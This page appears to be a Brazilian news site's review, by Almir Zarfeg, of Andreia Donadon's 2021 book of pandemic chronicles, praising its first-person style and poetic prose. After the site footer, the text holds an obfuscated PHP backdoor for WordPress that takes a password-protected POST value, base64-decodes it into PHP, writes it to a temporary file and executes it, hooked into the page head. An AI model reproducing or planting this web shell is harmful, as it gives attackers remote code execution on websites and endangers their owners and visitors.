• SEJA BEM-VINDO

Através de crônicas, Andreia Donadon apresenta suas impressões sobre a pandemia do novo coronavírus

Publicado em: 03/06/2022 Atualizado:: junho 3, 2022

Andreia Donadon: poeta, escritora e artista plástica mineira

 

Muito fácil para mim escrever sobre Andreia Donadon, até porque ela se me apresenta como uma figura multifacetada: a poeta, a escritora, a artista plástica, a ensaísta, a agitadora  cultural, enfim, uma das lideranças do Movimento Aldravista Mineiro, que legou ao Brasil a Aldravia, a Aldravintura e a Quinta, para ficar nas três criações mais originais dos artistas de Mariana/MG.

 

Portanto, é só escolher sobre qual das Andreias discorrer. O fato de eu ter sido apresentado a esse grupo de artistas em 2013, tornando-me membro da Academia de Letras, Artes e Ciências Brasil (ALACIB), da Sociedade Brasileira dos Poetas Aldravianistas (SBPA) e da Academia Internacional dos Quintanistas (AIQ), todas presididas por Andreia, pode tornar as coisas viáveis, não necessariamente fáceis.

 

Nesta oportunidade, vou me ater à Andreia cronista e autora de “Impressões sobre a pandemia”, livro editado em 2021 pela Aldrava Letras e Artes.

 

Almir Zarfeg exibindo exemplar de “Impressões sobre a pandemia”

 

A obra, composta por 27 crônicas, é dedicada à memória das vítimas da Covid-19 e aos profissionais da Saúde. Mas os textos não versam apenas sobre a pandemia do novo coronavírus no Brasil – com as mais de 667 mil vidas perdidas até agora –, como também sobre tantos outros temas que perpassaram o cotidiano de Andreia em 2000 e 2021 e que, com talento e arte, ela transformou em deliciosas crônicas.

 

Porque a crônica – como estamos carecas de saber – trata das ocorrências do dia a dia, do vaivém das coisas findas e lindas e do comportamento dos seres racionais e irracionais, como diriam os etólogos. Mas, para que tudo isso vire texto bem escrito, curto e contagiante, depende do talento do autor. E talento Andreia Donadon tem para dar, vender e emprestar.

 

Seus textos, quase sempre escritos na 1ª pessoa do singular, são envolventes. Ao transpor o eu lírico do poema para a crônica, Andreia (1º) estabelece uma relação de cumplicidade com seus escritos e leitores e, ao mesmo tempo (2º), subverte as fronteiras que separaram os eixos de associação das coisas, por proximidade, como se dá na prosa; e por semelhança, como acontece na poesia. Ao fazê-lo, mistura gêneros literários e o resultado é simplesmente arrebatador.

 

Agora me ocorre a crônica “Loucura concebida é esquadro de normalidade”, na qual a autora se concentra numa manhã, aparentemente normal como deviam ser as manhãs, para narrar uma série de ações. Ações em que os atos planejados dão lugar à espontaneidade e ao acaso. Aqui o tempo psicológico se impõe ao tempo cronológico, de sorte que a protagonista deixa escapar que “amanheceu saudade” e que talvez vá se dedicar às tarefas caseiras ou não. Enfim, ela é levada pela liberdade de não ter que agir assim e assado, como manda o figurino. Até porque louco é quem esquadrinhou a normalidade e, além do mais, pregaram Jesus na cruz e – por incrível que pareça – o caminho do céu ao inferno é mais tênue do que o fio da navalha… Assim haverá de transcorrer o dia, para que a tarde seja abocanhada pela entrada da noite e a nossa cronista possa, finalmente, “anoitecer esperança”.

 

Em resumo, ao imprimir um tom inesperado à narrativa e estabelecer o caos imprevisto à rotina de uma pessoa, em que o normal é substituído por um “novo normal”, Andreia deixa o texto mais interessante, ainda que fragmentado, mas muito irresistível para seus leitores. Claro que isso se tornou possível graças ao uso da 1ª pessoa e, igualmente, ao abuso da sensibilidade poética.

 

Com exceção de “A teoria de Maria Clara”, as demais crônicas são marcadas pela 1ª pessoa do discurso. Aparentemente diz respeito a uma escolha da autora. Prefiro enxergar aí uma estratégia estilístico-expressiva para conquistar a atenção e a simpatia dos leitores.  E promover envolvimento estético.

 

Nas crônicas, em que trata da questão da pandemia, Andreia não esconde sua revolta com os políticos que, tendo o poder de decisão, optaram pelo quanto pior melhor, pela desordem e pelo descaso genocida. Hipotecou seu reconhecimento aos profissionais da saúde e, também, não economizou na empatia com as vítimas do vírus e do verme.

 

Os textos “Resignação”, “Profissionais de saúde embalados pela esperança”, “Vade retro, 2020!”, “Bem-vindo, 2021!” e “Janeiro Branco?” foram dedicados exclusivamente aos altos e baixos da pandemia na terra brasilis.

 

Mas as crônicas de Andreia Donadon não se esgotam na questão pandêmica nem nas ocorrências diárias ou nos repentes rotineiros, o que não seria pouca coisa, uma vez que os textos são tratados com clareza e sensibilidade. Eles vão além e, por se tratar de uma artista polivalente, combinam ações e selecionam situações. Por contiguidade e similaridade.

 

Dessa maneira, prosa e poesia aparecem de mãos dadas. Os recursos da intertextualidade são convocados, para que nomes como Rachel de Queiroz, Albert Einstein, Cruz e Sousa, Tomás Antônio Gonzaga, Gilberto Madeira e João Gilberto compareçam.

 

E a própria autora, num notável exercício de autoconhecimento e metalinguagem, conquiste ainda mais seus leitores com pequenas obras-primas como “Para quem escrevo”, “Quero ser passarinho”, “O sorriso de Marielli”, “Meu poeta luz” e “Consciência do fracasso com o uso das palavras”. Ponto para Deia.

 

………………………….

 

Por Almir Zarfeg

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}